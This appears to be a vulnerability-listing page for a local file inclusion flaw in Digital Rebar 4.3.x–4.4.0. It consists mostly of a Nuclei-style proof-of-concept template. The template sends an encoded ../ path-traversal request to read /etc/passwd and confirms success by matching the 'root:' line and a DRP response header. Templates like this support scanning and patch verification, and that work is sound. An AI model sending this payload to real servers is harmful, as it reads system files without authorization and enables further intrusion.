digitalrebar-traversal: Digital Rebar - Local File Inclusion

2025-08-01 Digital Rebar PoC Public

Description

Digital Rebar versions 4.3.0, 4.3.2, 4.3.3, 4.4.0, and maybe others are vulnerable to local file inclusion because web requests can navigate outside of DRP controlled areas.

PoC

id: digitalrebar-traversal

info:
  name: Digital Rebar - Local File Inclusion
  author: c-sh0
  severity: high
  description: Digital Rebar versions 4.3.0, 4.3.2, 4.3.3, 4.4.0, and maybe others are vulnerable to local file inclusion because web requests can navigate outside of DRP controlled areas.
  reference:
    - https://docs.rackn.io/en/latest/doc/security/cve_20200924A.html
    - https://docs.rackn.io/en/latest/doc/release.html
  classification:
    cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
    cvss-score: 7.5
    cwe-id: CWE-22
  metadata:
    max-request: 1
  tags: lfi,rackn,digitalrebar,vuln

http:
  - method: GET
    path:
      - "{{BaseURL}}/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd"

    matchers-condition: and
    matchers:
      - type: regex
        part: body
        regex:
          - "root:.*:0:0"

      - type: word
        part: header
        words:
          - 'X-Drp-Sha256sum:'

      - type: status
        status:
          - 200
# digest: 4a0a0047304502203314d1d95685fb07cabd11497fcef13030391d190229050095a3be24594797c7022100cd63e2fad3f3d49a1b08b7df2d9ad284b745a603b93f8e104bb2eb4aff70e440:922c64590222798bb761d5b6d8e72950

# Visit https://trap.biu.life/ to view exploit trends for this vulnerability.

References

Related Vulnerabilities